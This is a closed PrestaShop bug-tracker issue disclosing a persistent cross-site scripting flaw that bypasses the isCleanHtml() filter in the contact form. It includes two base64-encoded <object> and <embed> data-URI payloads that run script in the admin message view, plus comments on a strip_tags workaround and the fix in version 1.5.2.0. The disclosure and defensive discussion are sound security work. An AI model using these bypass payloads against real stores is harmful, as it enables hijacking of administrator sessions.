Details

    • Type: Bug Bug
    • Status: Closed Closed
    • Resolution: Fixed
    • Affects Version/s: None
    • Fix Version/s: None
    • Labels:
      None
    • Environment:
      Affected browsers: Mozilla Firefox, Google Chrome and Apple Safari latest versions.

      Description

      Hello,
      When installing and analyzing PrestaShop on a secure environment I discovered that it's possible to bypass isCleanHtml() function, used in many places, specially in Contact Form.
      A user could use this vulnerability, a Persistent Cross-site Scripting, to execute malicious payloads on admins message box.

      Proof of concept:
      In the message field a user could write:
      <object data='data:text/html;base64,PHNjcmlwdD5hbGVydCgid2Vic2VndXJhLm5ldC14c3MiKTwvc2NyaXB0Pg=='></object>

      or

      <embed src='data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAwIiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIndlYnNlZ3VyYS5uZXQgeHNzIik7PC9zY3JpcHQ+PC9zdmc+' type='image/svg+xml' AllowScriptAccess='always'></embed>

      Both Base64 strings are mainly <script>alert()</script> encoded.

      Those XSS vectors bypass the filter on isCleanHtml() and execute automatically when the admin check the messages on the admin area. This is critical and could be used a lot causing bad scenarios.

      Keep in mind that on some webmail variations, the code is also executed. A user can even play with heading <h1> and other HTML on message box.
      I think that in this case in particular, HTML should be stripped out because it has no meaning in my opinion on the contact form. Of course, other solution is to sanitize user input improving the isCleanHtml() function.

      Hope this information helps you guys to keep PrestaShop more secure.
      By the way, nice job on PrestaShop. It's a easy and a reliable CMS to install and maintain. Keep up.

      Best regards,
      David Sopas
      @dsopas

        Activity

        Hide
        Andri Herumurti added a comment -

        Hi,

        thanks for the information,
        may i know workaround to secure our shop when we use 1.5.1 ?

        Show
        Andri Herumurti added a comment - Hi, thanks for the information, may i know workaround to secure our shop when we use 1.5.1 ?
        Hide
        David Sopas added a comment -

        Hi,
        You can strip all tags on message variable.

        In file /controllers/front/ContactController.php after the line:
        $message = Tools::getValue('message'); // Html entities is not usefull, iscleanHtml check there is no bad html tags.

        Add:
        $message = strip_tags($message);

        This could be a temporary fix until PrestaShop developers fix this issue.

        Show
        David Sopas added a comment - Hi, You can strip all tags on message variable. In file /controllers/front/ContactController.php after the line: $message = Tools::getValue('message'); // Html entities is not usefull, iscleanHtml check there is no bad html tags. Add: $message = strip_tags($message); This could be a temporary fix until PrestaShop developers fix this issue.
        Hide
        Andri Herumurti added a comment -

        Hi David,

        Thanks,

        may i know the side effect with add this line below to avoid XSS?
        $message = strip_tags($message);

        Show
        Andri Herumurti added a comment - Hi David, Thanks, may i know the side effect with add this line below to avoid XSS? $message = strip_tags($message);
        Hide
        David Sopas added a comment -

        It only disables all tags on message box on the Contact form.
        As I said before it's a temporary fix until PrestaShop developers check this security bug.

        Show
        David Sopas added a comment - It only disables all tags on message box on the Contact form. As I said before it's a temporary fix until PrestaShop developers check this security bug.
        Hide
        Andri Herumurti added a comment -

        Hi David,

        its just only contact form or there is another file that we should edit?
        maybe you found another security issue?

        Show
        Andri Herumurti added a comment - Hi David, its just only contact form or there is another file that we should edit? maybe you found another security issue?
        Hide
        David Sopas added a comment -

        So far, only that file.

        Show
        David Sopas added a comment - So far, only that file.
        Hide
        Andri Herumurti added a comment -

        Thank you very much for your information...

        Show
        Andri Herumurti added a comment - Thank you very much for your information...
        Hide
        Rémi GAILLARD added a comment -

        Hi Everyone,

        This issue is fixed on our 1.5.2.0 version which was released yesterday.
        You can upgrade your store to this version in order to secure your store.

        Best Regards,

        Show
        Rémi GAILLARD added a comment - Hi Everyone, This issue is fixed on our 1.5.2.0 version which was released yesterday. You can upgrade your store to this version in order to secure your store. Best Regards,
        Hide
        Fabien VINCENT added a comment -

        Is there any options to view changes in SVN like ViewVC or other ? scm.prestashop.com seems unaccessible, and I want to check if other versions I have installed for customers are vulnerable to this (1.2.x 1.4.x and 1.5.x). Is only 1.5.x affected by this security problem ?

        Show
        Fabien VINCENT added a comment - Is there any options to view changes in SVN like ViewVC or other ? scm.prestashop.com seems unaccessible, and I want to check if other versions I have installed for customers are vulnerable to this (1.2.x 1.4.x and 1.5.x). Is only 1.5.x affected by this security problem ?

          People

          • Assignee:
            Rémi GAILLARD
            Reporter:
            David Sopas
          • Votes:
            0 Vote for this issue
            Watchers:
            0 Start watching this issue

            Dates

            • Created:
              Updated:
              Resolved: